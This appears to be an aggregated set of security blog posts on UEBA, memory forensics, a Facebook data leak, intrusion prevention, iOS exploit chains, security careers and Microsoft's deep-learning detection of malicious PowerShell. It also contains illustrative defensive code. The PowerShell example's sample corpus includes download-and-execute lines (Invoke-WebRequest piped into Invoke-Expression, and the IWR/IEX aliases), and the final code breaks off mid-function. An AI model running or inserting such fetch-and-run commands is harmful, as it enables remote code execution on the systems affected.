Hackers and malicious attackers are evolving to the point that conventional security tools are fast becoming obsolete. Firewalls, gateways, and intrusion prevention applications can be bypassed now, which is especially true with bigger corporations, since their IT is more complex to maintain and manage.

Detection is now incredibly important, more so than ever, because it is just a matter of time for hackers to figure out your defenses and get into the network. It is up to other systems, such as UEBA, to detect anomalous activities for immediate response and potential threat prevention.

How UEBA Works

The concept of UEBA is quite simple. Hackers can steal usernames and passwords, but it would be difficult for them to mimic an employee’s habits or normal behavior when accessing the company’s network, especially since their intent is to steal rather than to work.

A relatable analogy here is if a thief is able to steal your credit card. That thief would then go on a shopping spree, using your card in retail stores that you do not normally visit. This would trigger the bank’s fraud detection policies.

Because of this, UEBA has proven to be an important part of any organization’s IT security.

  • It can detect insider threats, such as an employee or group of employees who’ve decided to go rogue against the company by stealing data. This can be detected by UEBA.
  • It can detect compromised accounts like in the above example. A hacker may obtain the username and password of an employee and start stealing information. This anomalous behavior can be detected by UEBA.
  • A brute-force attack is a common hacker tool that can be hindered or otherwise prevented by UEBA.
  • It can detect changes in user permissions or the creation of super admins to flag these, especially if they are deemed unnecessary by the system.
  • UEBA can prevent unauthorized access of sensitive and protected data, limiting access to only those who actually need said data.
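The detections listed above, worked through as an added example that is not part of the original article: a toy UEBA-style check builds a per-user download baseline from constructed history, then flags the 10MB-a-day user who suddenly pulls 100GB, a burst of failed logins, and a promotion to a privileged role. All users, volumes and thresholds are constructed for illustration.

```python
"""Toy UEBA baseline check (added example; constructed data, not a real product)."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed baseline: daily download volume in MB per user over ten days.
BASELINE_MB = {
    "alice": [9, 11, 10, 12, 8, 10, 11, 9, 10, 10],           # ~10 MB/day
    "bob": [200, 250, 180, 220, 210, 240, 190, 230, 200, 210],  # ~213 MB/day
}

# Constructed event log for the day under review, oldest first.
EVENTS = [
    {"user": "alice", "type": "download", "mb": 100_000},   # 100 GB from a 10 MB/day user
    {"user": "bob", "type": "download", "mb": 260},          # busy but within bob's norm
    *[{"user": "carol", "type": "login_failed"} for _ in range(12)],
    {"user": "dave", "type": "role_change", "new_role": "superadmin"},
]

ZSCORE_LIMIT = 3.0            # how many standard deviations count as "not this user"
FAILED_LOGIN_THRESHOLD = 10   # failed logins in one day that look like password guessing
PRIVILEGED_ROLES = {"superadmin", "domain_admin"}


def build_profiles(baseline):
    """Per-user (mean, standard deviation) of daily download volume."""
    return {user: (mean(v), pstdev(v)) for user, v in baseline.items()}


def download_anomaly(profiles, user, mb):
    """Return (is_anomalous, z_score); users without a baseline are still learning."""
    if user not in profiles:
        return False, None
    avg, sd = profiles[user]
    # Floor the deviation so a perfectly flat history cannot make a tiny change look extreme.
    sd = max(sd, 0.05 * avg, 1e-9)
    z = (mb - avg) / sd
    return z > ZSCORE_LIMIT, z


def analyze(events, baseline):
    """Run the day's events against the baselines; return (kind, user, detail) alerts."""
    profiles = build_profiles(baseline)
    failed_logins = defaultdict(int)
    alerts = []
    for ev in events:
        user = ev["user"]
        if ev["type"] == "download":
            hit, z = download_anomaly(profiles, user, ev["mb"])
            if hit:
                alerts.append(("volume_anomaly", user, f"{ev['mb']} MB, z={z:.1f}"))
        elif ev["type"] == "login_failed":
            failed_logins[user] += 1
            if failed_logins[user] == FAILED_LOGIN_THRESHOLD:   # alert once per burst
                alerts.append(("brute_force", user, f"{failed_logins[user]} failed logins"))
        elif ev["type"] == "role_change" and ev["new_role"] in PRIVILEGED_ROLES:
            alerts.append(("privilege_change", user, ev["new_role"]))
    return alerts


if __name__ == "__main__":
    for kind, user, detail in analyze(EVENTS, BASELINE_MB):
        print(f"{kind:18} {user:8} {detail}")
```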

Best Practices of UEBA

UEBA was established due to the malicious behavior of users and other entities. It is not meant to replace other monitoring systems but to complement them instead, which enhances your organization’s overall security.

It is a great idea to harness Big Data, statistical analysis, and machine learning in order to prevent a huge increase in useless alerts due to the large amount of data generated.

UEBA essentially helps you take a more proactive approach in IT security and threat detection. It creates a layer of protection against malicious attacks. And as they say, prevention is always better than a cure.


Memory Forensics: The Key to Better Cybersecurity

When companies fall victim to a cyberattack, the first thing they do is eliminate the threat. But for cybersecurity investigators, that’s just the first part of their job. Like real-world investigators, cybersecurity experts need to gather and analyze evidence of the attack to improve cybersecurity policies or to present it in court during a hearing. Cyber investigators do their evidence gathering through memory forensics.

What Is Memory Forensics?

Memory forensics is the process of collecting memory dumps and analyzing them for evidence of how a cybercrime happened or to find the origins of a malware breach. This is usually done after a cyberattack, but cybersecurity specialists can also do this as a routine check-up for malicious injections that could be running in the system.

Memory forensics is a way to backtrack events that led to a successful security breach and to help specialists know how to improve their company’s cybersecurity.

How Is Memory Forensics Done?

Memory forensics, also known as memory analysis, can be broken down into three parts: retrieval, analysis, and documentation.

  1. Retrieval

The first part of memory forensics is the retrieval phase. Because all activities done and actions taken in a computer are recorded in the system’s memory, cyber investigators need to retrieve the system memory to see when and where the cyberattack began. It’s like retrieving an airplane’s black box after a crash.

To retrieve the system’s memory, cyber investigators perform a memory dump. This is a procedure where data in a system’s RAM is read and transferred to a storage device. Retrieving RAM data is important, since this is “volatile” data, meaning that it is only retained when the system is on and disappears once the system is turned off.

If there is no cyberattack or breach, memory dumps can help IT specialists understand a crash event and how it happened. There are many kinds of memory dump tools available in the market.

  2. Analysis

The second phase is memory analysis. This is the part where cyber investigators look through the system’s memory dump for signs of malicious activities. Investigators take memory analysis seriously, and they will search for hidden folders and retrieve deleted or encrypted files.

Memory analysis can take days or months to complete. Retrieved memory dumps are examined using different analyzing tools and software.

  3. Documentation

The last phase of memory forensics is the documentation phase. All pieces of evidence and significant activities discovered during memory analysis are recorded. Once the collected memory dumps are thoroughly analyzed, investigators take note of every detail of the event and carefully create a report.

This report is then validated by running tests on the system and checking for inconsistencies. After validation, the report is ready for presentation in court and other legal proceedings or to company management to help improve cybersecurity.

Conclusion

No matter how strong a company’s cybersecurity is, they can still be victims of a cyberattack. And when that happens, it’s crucial to know when and how the cyberattack happened so vulnerabilities can be addressed and cybercriminals can be tracked down.

If you’re worried about your cybersecurity, now is a good time to do your own memory forensics to see if you have been compromised.


Attention Facebook Users: Here’s What You Need to Know About the Recent Breach

With over 2.4 billion monthly active users, Facebook is the biggest social network worldwide. And with so many users come tons of data, including some personal information that may now potentially be exposed. According to TechCrunch, a security researcher found an online database exposing 419 million user phone numbers linked to Facebook accounts.

It appears that the exposed server wasn’t password-protected, meaning that anyone with internet access could find the database. This server held records containing a user’s unique Facebook ID and the phone number associated with the account. In some cases, records also revealed the user’s name, gender, and location by country. TechCrunch was able to verify several records in the database by matching a known Facebook user’s phone number with their listed Facebook ID. Additionally, TechCrunch was able to match some phone numbers against Facebook’s password reset feature, which partially reveals a user’s phone number linked to their account.

It’s been over a year since Facebook restricted public access to users’ phone numbers. And although the owner of the database wasn’t found, it was pulled offline after the web host was contacted. Even though there has been no evidence that the Facebook accounts were compromised as a result of this breach, it’s important for users to do everything they can to protect their data. Here are some tips to keep in your cybersecurity arsenal:

  • Change your password. Most people will rotate between the same three passwords for all of their accounts. While this makes it easier to remember your credentials, it also makes it easier for hackers to access more than one of your accounts. Try using a unique password for every one of your accounts or employ a password manager.
  • Enable two-factor authentication. While a strong and unique password is a good first line of defense, enabling app-based two-factor authentication across your accounts will help your cause by providing an added layer of security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention Facebook Users: Here’s What You Need to Know About the Recent Breach appeared first on McAfee Blogs.

What Is an Intrusion Prevention System?

When you need a tool to find and detect malicious activity within a network, an intrusion prevention system (IPS) fills that role. It first detects malicious activity in the network, reports on it, and then tries to block or stop it from operating further.

An intrusion prevention system expands the capabilities of an intrusion detection system (IDS), which monitors network and systems traffic. The advantage of an IPS over an IDS is the fact that these are found in-line, at the path of the source and the destination, and can block malicious activities from occurring in the network.

How Do Intrusion Prevention Systems Work?

Usually found behind a firewall, an intrusion prevention system functions as an additional layer of filtering for malicious activities. If something gets through the firewall, the IPS is there to catch it. They are capable of analyzing and taking action on network traffic. Actions include sending out alerts to admins, dropping potentially dangerous packets, stopping traffic from a source of malicious activities, and even restarting connections.

It is important to note, however, that an IPS should be efficient so it does not hinder the performance of a network. At the same time, the intrusion prevention system should act quickly and accurately, catching malicious activities in real time while recognizing false positives.

How an Intrusion Prevention System Detects Malicious Activities

There are several ways that an intrusion prevention system can find and detect malicious activities. The two main methods are statistical anomaly-based detection and signature-based detection.

Signature-based detection involves using a dictionary of identifiable signatures, located in the code of an exploit. This can be categorized further into two methods: vulnerability-facing and exploit-facing. The first detects malicious activities based on specific network vulnerabilities, while the second checks for common attack patterns.

For statistical anomaly-based detection, intrusion prevention systems use random samples of network traffic, then compare them to predetermined baseline performance levels. If something is off, it will then send out an alert or take action.
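The in-line behaviour and the signature path described above, as an added example that is not from the original article: a toy IPS evaluates each packet against an exploit-facing rule (a fixed marker in the payload), a vulnerability-facing rule (an overlong HTTP request line, whatever it contains) and an alert-only policy rule, then forwards, drops or resets the connection and keeps dropping traffic from a source it has blocked. Packets, addresses and the marker string are constructed placeholders.

```python
"""Toy in-line IPS with signature rules (added example; constructed traffic)."""
from dataclasses import dataclass
from typing import Callable, List


@dataclass
class Packet:
    src: str
    dst: str
    dport: int
    payload: bytes


@dataclass
class Rule:
    name: str
    kind: str                          # "exploit-facing" or "vulnerability-facing"
    action: str                        # "alert", "drop" or "block"
    match: Callable[[Packet], bool]


MAX_REQUEST_LINE = 512   # constructed limit for what the protected parser tolerates


def overlong_http_line(pkt: Packet) -> bool:
    """Vulnerability-facing: any HTTP line longer than the parser handles, regardless of content."""
    return pkt.dport == 80 and any(len(line) > MAX_REQUEST_LINE for line in pkt.payload.split(b"\r\n"))


RULES = [
    # Exploit-facing: a specific byte pattern. The marker is a constructed placeholder.
    Rule("known-exploit-marker", "exploit-facing", "block", lambda p: b"EXPLOIT-MARKER-0001" in p.payload),
    Rule("overlong-http-line", "vulnerability-facing", "drop", overlong_http_line),
    # Policy rule: cleartext telnet is worth an alert but is not blocked here.
    Rule("cleartext-telnet", "vulnerability-facing", "alert", lambda p: p.dport == 23),
]

SEVERITY = {"alert": 0, "drop": 1, "block": 2}


class InlineIPS:
    def __init__(self, rules: List[Rule]):
        self.rules = rules
        self.blocked_sources = set()
        self.alerts = []          # (rule name, rule kind, source) for the admin

    def process(self, pkt: Packet) -> str:
        """Return the verdict for one packet: 'forward', 'drop' or 'reset'."""
        if pkt.src in self.blocked_sources:
            return "drop"                       # source already cut off, no new alert
        strongest = None
        for rule in self.rules:
            if rule.match(pkt):
                self.alerts.append((rule.name, rule.kind, pkt.src))
                if strongest is None or SEVERITY[rule.action] > SEVERITY[strongest]:
                    strongest = rule.action
        if strongest == "block":
            self.blocked_sources.add(pkt.src)   # stop all further traffic from the source
            return "reset"                      # tear the connection down
        if strongest == "drop":
            return "drop"
        return "forward"                        # nothing matched, or alert-only


# Constructed traffic: a normal request, an overlong one, telnet, a marked payload,
# and a follow-up packet from the source that was just blocked.
PACKETS = [
    Packet("10.0.0.5", "10.0.1.10", 80, b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"),
    Packet("10.0.0.5", "10.0.1.10", 80, b"GET /" + b"A" * 600 + b" HTTP/1.1\r\n\r\n"),
    Packet("10.0.0.9", "10.0.1.10", 23, b"login: admin\r\n"),
    Packet("198.51.100.7", "10.0.1.10", 80, b"POST /upload HTTP/1.1\r\n\r\nEXPLOIT-MARKER-0001"),
    Packet("198.51.100.7", "10.0.1.10", 443, b"\x16\x03\x01"),
]


def run(packets, rules=RULES):
    """Push packets through a fresh IPS; return (verdicts, alerts)."""
    ips = InlineIPS(rules)
    verdicts = [ips.process(p) for p in packets]
    return verdicts, ips.alerts


if __name__ == "__main__":
    verdicts, alerts = run(PACKETS)
    for pkt, verdict in zip(PACKETS, verdicts):
        print(f"{pkt.src:14} -> {pkt.dst}:{pkt.dport:<4} {verdict}")
    print(alerts)
```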

Comparing Intrusion Prevention Systems

There are four common types of an intrusion prevention system. First is the network-based intrusion prevention system, which has the ability to check and monitor the entire network to look for suspicious activities based on protocol activity.

A wireless intrusion prevention system, on the other hand, checks wireless security protocols to catch anomalies and suspicious activities.

Network behavior analysis checks the network traffic flow for unusual activities such as a spike in traffic or anything that may seem different, like a DDoS attack.

The final common type is the host-based intrusion prevention system, which is an installed software that checks a single host for suspicious activities.

Which Intrusion Prevention System to Use?

There are many offerings when it comes to intrusion prevention systems. To help choose the best one, it is best to set a budget first, define the requirements of your network, and then research the different systems available in the market to see if they fit what you need.

Remember, an intrusion prevention system is not a comprehensive security solution. While it can be a valuable asset in any organization’s security to detect malicious activities, other tools are needed for endpoint security, data protection, incident responses, and more.


iPhone Users: Here’s What You Need to Know About the Latest iOS Hacks

iPhone hacks have often been considered by some to be a rare occurrence. However, a group of Google researchers recently discovered that someone has been exploiting multiple iPhone vulnerabilities for the last two years. How? Simply by getting users to visit a website.

How exactly does this exploitation campaign work? According to WIRED, researchers revealed a handful of websites that had assembled five exploit chains. These exploit chains are tools that link security vulnerabilities together and allow a hacker to penetrate each layer of iOS digital protections. This campaign took advantage of 14 security flaws, resulting in the attacker gaining complete control over a user’s phone. Researchers state that these malicious sites were programmed to assess the Apple devices that loaded them and compromise the devices with powerful monitoring malware if possible. Once the malware was installed, it could monitor live location data, grab photos, contacts, passwords, or other sensitive information from the iOS Keychain.

So, what makes this attack unique? For starters, this exploitation campaign hides in plain sight, uploading information without any encryption. If a user monitored their network traffic, they would notice activity as their data was being uploaded to the hacker’s server. Additionally, a user would be able to see suspicious activity if they connected their device to their computer and reviewed console logs. Console logs show the codes for the programs being run on the device. However, since this method would require a user to take the extra step of plugging their iPhone into a computer, it’s highly unlikely that they would notice the suspicious activity.

Although iOS exploits usually require a variety of complexities to be successful, this exploitation campaign proves that iOS hacking is very much alive and kicking. So, what can Apple users do to help ward off these kinds of attacks? Here’s how you can help keep your device secure:

  • Install automatic updates. In your device settings, choose to have automatic updates installed on your device. This will ensure that you have the latest security patches for vulnerabilities like the ones leveraged in these exploit chains as soon as they’re available.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post iPhone Users: Here’s What You Need to Know About the Latest iOS Hacks appeared first on McAfee Blogs.

Introduction to “Is Your Digital Front Door Unlocked?” a book by Gary Davis

“Is Your Digital Front Door Unlocked?” explores the modern implications of our human nature: our inherent inclination to share our experiences, specifically on the internet. Our increasing reliance on technology to connect with others has us sharing far more information about ourselves than we realize, and without a full understanding of the risks involved.

While we’re posting innocent poolside pictures, we’re also creating a collection of highly personal information. And not just on social media. It happens by simply going about our day. Whether it is the computers we use for work and play, the smartphones that are nearly always within arm’s reach, or the digital assistants that field household requests—all of these devices capture and share data about our habits, our interests, and even our comings and goings. Yet we largely don’t know it’s happening—or, for that matter, with whom we’re sharing this information, and to what end.

I wrote this book for anyone who wants to live online as safely and privately as possible, for the sake of themselves and their family. And that should be plenty of us. With news of data breaches, companies sharing our personal information without our knowledge, and cybercrime robbing the global economy of an estimated $600 billion a year, it’s easy to feel helpless. But we’re not. There are things we can do. It’s time to understand how we’re creating all this personal information so we can control its flow, and who has access to it. The book takes an even-handed look at the most prevalent privacy and security challenges facing individuals and families today. It skips the scare tactics that can dominate the topic, and illustrates the steps each of us can take to lead more private and secure lives in an increasingly connected world.

The notion that binds the book together is the idea of a personal data lake. “Data lake” is a widely used term in business to reflect a large repository of data that companies collect and store. In the book I explore how we create personal data lakes as we go about our digital lives. I explore how our data lakes fill as we do more and more activities online, and offer insights that can be used to protect our personal data lakes, so that we can live more privately and enjoy safe online experiences.

This book is for people in families of any size or structure. It looks at security and privacy across the stages of life, and explores the roles each of us play in those stages, from birth to the time we eventually leave a digital legacy behind, along with important milestones and transitional periods in between. You’ll see how security and privacy are pertinent at every step of your digital journey, and how specific age groups have concerns that are often unique to that stage of life. The structure allows you to easily navigate to the chapters and sections that most relate to the life stage you are in, and offers guidance.

This book, like most things in life, is about choice. You can choose to roll the dice and hope that you’re not one of the hundreds of millions who are victims each year of phishing scams, ransomware attacks, and identity theft, or among the handful of people who still fall for the Nigerian prince lottery scam. You can also choose to use your computers, tablets, smartphones, and personal assistants as you have been, letting companies grift all kinds of personal information from you, without your knowledge or consent. Or you can choose to embrace the guidelines outlined in the book and make it far more difficult for a bad actor or cybercriminal to make you or your loved ones a victim.

Gary Davis’ book, Is Your Digital Front Door Unlocked?, is available September 5, 2019 and can be ordered at amazon.com.

The post Introduction to “Is Your Digital Front Door Unlocked?” a book by Gary Davis appeared first on McAfee Blogs.

Cybersecurity to be the biggest threat to the enterprise for the next decade


Ernst & Young (EY) conducted a CEO Imperative survey, gathering insights from 200 global CEOs, including leaders of some of Forbes’ largest private companies, on what they expect to be the biggest problem for businesses in the coming years. The professional services giant put the same question to 100 senior investors who each manage at least $100 billion in assets. The result: this group overwhelmingly named cybersecurity as the biggest threat to the enterprise over the next five to ten years.

Seqrite agrees with the report. Stakeholders are thinking along the right lines, but they do not yet fully grasp the gravity of the situation.

According to the findings for Q1 2019 that Seqrite published in its quarterly threat report, our labs recorded 28 million malware detections targeting Windows systems, and that is for a single quarter.

Attackers constantly try to stay a step ahead by designing malware that evades even the best security systems. Emotet and TrickBot are recent examples of how sophisticated and complex malware has become.

If cyberattacks are the main problem for enterprises, stakeholders need to look at the channels through which malware enters a business network: email, content collaboration platforms, office messengers, social media, websites and so on.

These are the times of digital transformation. More and more organizations are going digital at lightning speed, and every business now needs this change for a number of reasons, among them:

  • To stay at par with the competition
  • To be efficient and agile
  • To be fast and to be in sync with how everybody is doing business today

The penetration channels listed above are therefore core components of an enterprise’s digitalization initiative. Attackers know that businesses cannot function without digital channels, and this is where most attacks now happen. Compare this with a couple of decades ago, when digitalization was minimal and businesses were largely unfamiliar with cyberattacks.

  • Businesses that have experienced cyberattacks on operational technology infrastructure – 31%
  • On average, companies lose $2.4 million after a malware attack with up to 50 days of downtime
  • By 2021, cyberattacks are expected to damage the global economy by $6 trillion

Large corporations may be able to recover from this; for SMBs and SOHOs, however, the impact of such an attack can be back-breaking. CXOs everywhere need to think about when an attack will happen rather than if. That turns cyberthreats into a business problem rather than merely an IT problem.

This is where CTOs and CISOs come into the picture. It also forces a re-alignment of budgets to prioritize safeguarding the enterprise. So far, budget allocations have favoured domains such as marketing, sales and IT. This needs to change, and cybersecurity needs to receive a substantial share of annual budgets.

Technology officers, for their part, need to start implementing simple but effective measures to secure business networks against cyberattacks.

Secure endpoints, networks, and data

Partnering with a proven cybersecurity vendor is usually more effective than building an in-house team from scratch to defend an enterprise’s IT infrastructure. CTOs and CISOs should opt for a single solution that secures every digital channel the enterprise uses.

Review cybersecurity readiness of the employees periodically

The biggest threat to enterprise data is its own employees. That is not because employees knowingly make mistakes: innocent errors happen, and with the growing culture of BYOD and CYOD, critical business data is at risk. Hence the importance of periodically reviewing employees’ cybersecurity readiness.

Conduct third-party audits to avoid supply chain attacks

Attackers will always go for the weakest link in an enterprise. Supply chain attacks can happen in any industry, and third-party audits act like medical check-ups, revealing whether these systems are sick before an attacker finds out.

Have an action plan in place and prepare for the worst-case scenario

CXOs need to settle on contingency plans for an attack. Designing incident protocols and business continuity processes in advance helps an enterprise keep operating when an attack does occur.

Seqrite offers best-in-class cybersecurity solutions that enterprises can leverage for a robust defence. Cyberattacks are here to stay, with hackers finding ever more varied ways to attack networks and jumping on the gold rush created by cryptocurrency theft, data theft and the theft of financial information. With so many CEOs agreeing on the dangers of cybercrime, enterprises should act now!

The post Cybersecurity to be the biggest threat to the enterprise for the next decade appeared first on Seqrite Blog.

A Guide to Cyber Security Salary

The cyber security market is expected to reach around $170 billion in 2020. Burning Glass Technologies research from 2015 shows that cyber security salaries are about 9% higher than those of other IT workers. Yet there remains a shortage of qualified professionals in this field: the cybersecurity workforce gap is projected to reach around 1.8 million by 2022.

David Shearer, CEO of ISC², said at a press conference that 66% of workers report having far too few qualified colleagues ready to combat the current threats in the industry; other research reaches a similar finding, confirming a genuine shortage of cybersecurity professionals earning a cyber security salary.

In the U.S., there were about 780,000 employed cybersecurity professionals in 2017, alongside 350,000 open positions and a 0% unemployment rate for the field. This is impressive for any industry.

There is a growing need for experienced cybersecurity personnel, which shows the tremendous potential of this field in terms of salary, job security, and advancement. An analysis of Bureau of Labor Statistics data shows 74% growth in cybersecurity job postings.

Most Popular Cybersecurity Roles

There are many options for IT professionals who want to pursue a career in cybersecurity and earn a cyber security salary. They need strong communication skills, along with good knowledge of the threat landscape and of the technologies and tools that cybersecurity teams use to detect, mitigate, and prevent threats.

If you want to proceed with this field, here are a few of the roles that are in high demand:

Security Architect

These are the people who put themselves in the shoes of an attacker to find ways a system could be attacked, so those attacks can be prevented. They also maintain the security of the enterprise’s computer systems and must stay up to date with the latest news and technologies in the industry.

Malware Analyst

There has been a rapid rise in ransomware attacks in the past few years, and the role of the malware analyst is to understand and defend against these threats. One example is the WannaCry ransomware attack, which resulted in an estimated $4 billion in losses.

IT Security Engineer

This role focuses on the quality control of IT environments so security measures are in place to address threats.

Security Software Developer

There is a never-ending need for developers who can create tools, programs, and software to counter what hackers do.

Security Systems Administrator

This role is responsible for defending networks and systems from unauthorized access and for defining security requirements.

Data Security Strategist

More and more enterprises are moving toward AI, and this has led to a rise in demand for data security strategists because they focus on efficient data security functions and storage. They also help in creating policies for stored data.

Becoming a Cybersecurity Professional

Many cybersecurity professionals start out in the field as ethical hackers. They see first-hand how easy it is to break into vulnerable systems, and translate that knowledge into software and policies that protect endpoints, networks, and applications.

Others gain knowledge through joining different organizations or even the military, which has some of the highest standards when it comes to cybersecurity.

In order to advance in the career of cybersecurity and make a good cyber security salary, you need to:

Ask Questions

There is no single professional in the security business who knows it all. With the rapid pace of new threats and technologies, there is no one person who would have all the available information.

Promote your Work

Good security work can go unnoticed. People outside the IT industry often do not understand the importance of what you do or why security policies matter, so you need to take the lead in promoting these policies within the organization.

Communicate

This is a very technical field, but you should avoid jargon when talking about threats and security needs with employees and other departments, so that they understand the key policies and processes.

Keep Learning

It is important to keep up with ever-evolving threats and technologies so you know how best to defend the organization.

Educational and Background Requirements

There are several degree options that you can study in order to become a proper cybersecurity professional and make a good cyber security salary:

  • Internet security.
  • Computer forensics.
  • Cryptography.
  • Data recovery.

There are certifications you can take as well, such as:

  • CISA.
  • CISM.
  • CISSP.
  • Certified Penetration Tester.
  • Certified Ethical Hacker.
  • Certified Computer Forensics Examiner.

Cyber Security Salary

Based on recent data, the average annual cyber security salary in 15 cities in the United States is the following:

  1. Minneapolis: $127,757.
  2. Seattle: $119,349.
  3. San Francisco: $119,346.
  4. Dallas: $117,890.
  5. Denver: $117,308.
  6. Chicago: $111,303.
  7. Austin: $110,190.
  8. Salt Lake City: $106,207.
  9. New York: $102,271.
  10. San Jose: $99,075.
  11. San Diego: $98,303.
  12. Washington: $92,191.
  13. Boston: $88,453.
  14. Los Angeles: $86,072.
  15. Arlington: $74,254.

While salaries vary with location, role, experience level, and company, it is clear that cyber security professionals are in high demand and are compensated accordingly. As the threat landscape continues to expand, more and more security professionals are needed to create the policies, tools, and applications that keep modern enterprises safe.

Also Read,

The Role of a vCISO in Enterprise Security

Why Cybersecurity Recruitment On The Rise?

Australia’s Shortage of Cybersecurity Professionals, Highlighted by the Government

The post A Guide to Cyber Security Salary appeared first on .

Deep learning rises: New methods for detecting malicious PowerShell

Scientific and technological advancements in deep learning, a category of algorithms within the larger framework of machine learning, provide new opportunities for development of state-of-the art protection technologies. Deep learning methods are impressively outperforming traditional methods on such tasks as image and text classification. With these developments, there’s great potential for building novel threat detection methods using deep learning.

Machine learning algorithms work with numbers, so objects like images, documents, or emails are converted into numerical form through a step called feature engineering, which, in traditional machine learning methods, requires a significant amount of human effort. With deep learning, algorithms can operate on relatively raw data and extract features without human intervention.

At Microsoft, we make significant investments in pioneering machine learning that inform our security solutions with actionable knowledge through data, helping deliver intelligent, accurate, and real-time protection against a wide range of threats. In this blog, we present an example of a deep learning technique that was initially developed for natural language processing (NLP) and now adopted and applied to expand our coverage of detecting malicious PowerShell scripts, which continue to be a critical attack vector. These deep learning-based detections add to the industry-leading endpoint detection and response capabilities in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP).

Word embedding in natural language processing

Keeping in mind that our goal is to classify PowerShell scripts, we briefly look at how text classification is approached in the domain of natural language processing. An important step is to convert words to vectors (tuples of numbers) that can be consumed by machine learning algorithms. A basic approach, known as one-hot encoding, first assigns a unique integer to each word in the vocabulary, then represents each word as a vector of 0s, with 1 at the integer index corresponding to that word. Although useful in many cases, the one-hot encoding has significant flaws. A major issue is that all words are equidistant from each other, and semantic relations between words are not reflected in geometric relations between the corresponding vectors.

Contextual embedding is a more recent approach that overcomes these limitations by learning compact representations of words from data under the assumption that words that frequently appear in similar context tend to bear similar meaning. The embedding is trained on large textual datasets like Wikipedia. The Word2vec algorithm, an implementation of this technique, is famous not only for translating semantic similarity of words to geometric similarity of vectors, but also for preserving polarity relations between words. For example, in Word2vec representation:

Madrid – Spain + Italy ≈ Rome

Embedding of PowerShell scripts

Since training a good embedding requires a significant amount of data, we used a large and diverse corpus of 386K distinct unlabeled PowerShell scripts. The Word2vec algorithm, which is typically used with human languages, provides similarly meaningful results when applied to the PowerShell language. To accomplish this, we split the PowerShell scripts into tokens, which then allowed us to use the Word2vec algorithm to assign a vectorial representation to each token.

Figure 1 shows a 2-dimensional visualization of the vector representations of 5,000 randomly selected tokens, with some tokens of interest highlighted. Note how semantically similar tokens are placed near each other. For example, the vectors representing -eq, -ne and -gt, which in PowerShell are aliases for “equal”, “not-equal” and “greater-than”, respectively, are clustered together. Similarly, the vectors representing the allSigned, remoteSigned, bypass, and unrestricted tokens, all of which are valid values for the execution policy setting in PowerShell, are clustered together.

Figure 1. 2D visualization of 5,000 tokens using Word2vec

Examining the vector representations of the tokens, we found a few additional interesting relationships.

Token similarity: Using the Word2vec representation of tokens, we can identify commands in PowerShell that have an alias. In many cases, the token closest to a given command is its alias. For example, the representations of the token Invoke-Expression and its alias IEX are closest to each other. Two additional examples of this phenomenon are the Invoke-WebRequest and its alias IWR, and the Get-ChildItem command and its alias GCI.

We also measured distances within sets of several tokens. Consider, for example, the four tokens $i, $j, $k and $true (see the right side of Figure 2). The first three are usually used to represent a numeric variable and the last naturally represents a Boolean constant. As expected, the $true token mismatched the others – it was the farthest (using the Euclidean distance) from the center of mass of the group.

More specific to the semantics of PowerShell in cybersecurity, we checked the representations of the tokens: bypass, normal, minimized, maximized, and hidden (see the left side of Figure 2). While the first token is a legal value for the ExecutionPolicy flag in PowerShell, the rest are legal values for the WindowStyle flag. As expected, the vector representation of bypass was the farthest from the center of mass of the vectors representing all other four tokens.

Figure 2. 3D visualization of selected tokens

Linear Relationships: Since Word2vec preserves linear relationships, computing linear combinations of the vectorial representations results in semantically meaningful results. Below are a few interesting relationships we found:

high – $false + $true ≈ low
-eq – $false + $true ≈ -neq
DownloadFile – $destfile + $str ≈ DownloadString
Export-CSV – $csv + $html ≈ ConvertTo-html
Get-Process – $processes + $services ≈ Get-Service

In each of the above expressions, the sign ≈ signifies that the vector on the right side is the closest (among all the vectors representing tokens in the vocabulary) to the vector that is the result of the computation on the left side.
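The token-level behaviour described in this section (aliases landing next to the cmdlets they alias, and the vector arithmetic above) can be reproduced on a small scale with a count-based distributional embedding, which rests on the same “similar context, similar meaning” assumption as Word2vec but is deterministic and needs no training library. The Python below is an added example written for this page; it is not the Microsoft Defender ATP code, and its tokenizer, two-token context window and seven constructed PowerShell one-liners are assumptions, not the 386K-script corpus. It also shows why one-hot vectors are useless for this purpose: every pair of tokens is the same distance apart.

```python
"""Count-based distributional embedding of PowerShell tokens (added example).
Stands in for the Word2vec step of the post; tokenizer, window and corpus are
assumptions made for this illustration, not the Defender ATP pipeline."""
import math
import re
from collections import Counter, defaultdict

# Constructed corpus, not the 386K-script dataset.  Alias/cmdlet pairs are
# written in otherwise identical lines so they share contexts exactly.
SAMPLE_SCRIPTS = [
    "$page = Invoke-WebRequest -Uri $url ; Invoke-Expression $page.Content",
    "$page = IWR -Uri $url ; IEX $page.Content",
    "$items = Get-ChildItem -Path $dir ; foreach ($f in $items) { Invoke-Expression $f }",
    "$items = GCI -Path $dir ; foreach ($f in $items) { IEX $f }",
    "if ($i -eq 0) { Write-Output $i } ; if ($j -ne 0) { Write-Output $j } ; "
    "if ($k -gt 0) { Write-Output $k }",
    "$processes = Get-Process -Name $name ; $processes | Export-CSV $csv",
    "$services = Get-Service -Name $name ; $services | Export-CSV $csv",
]

# Alternatives are ordered so "$i", "-eq" and "Invoke-Expression" each become one token.
TOKEN_RE = re.compile(r"""
      \$[\w:]+            # variables: $url, $env:TEMP
    | -[A-Za-z]+          # parameters and operators: -Uri, -eq, -ne
    | [A-Za-z_][\w-]*     # cmdlets, aliases, keywords: Invoke-Expression, IEX, if
    | "[^"]*" | '[^']*'   # string literals kept as a single token
    | \d+                 # numeric literals
    | [{}()\[\];|=,.+]    # punctuation
""", re.VERBOSE)


def tokenize(script):
    """Split a script into tokens; PowerShell is case-insensitive, so fold case."""
    return [t.lower() for t in TOKEN_RE.findall(script)]


def one_hot_distance(a, b, vocab):
    """Euclidean distance between the one-hot vectors of two tokens.
    It is sqrt(2) for every distinct pair: the geometry carries no semantics."""
    index = {tok: i for i, tok in enumerate(sorted(vocab))}
    va = [1.0 if i == index[a] else 0.0 for i in range(len(index))]
    vb = [1.0 if i == index[b] else 0.0 for i in range(len(index))]
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(va, vb)))


def build_embedding(scripts, window=2):
    """Represent each token by the counts of tokens seen within +/-window of it."""
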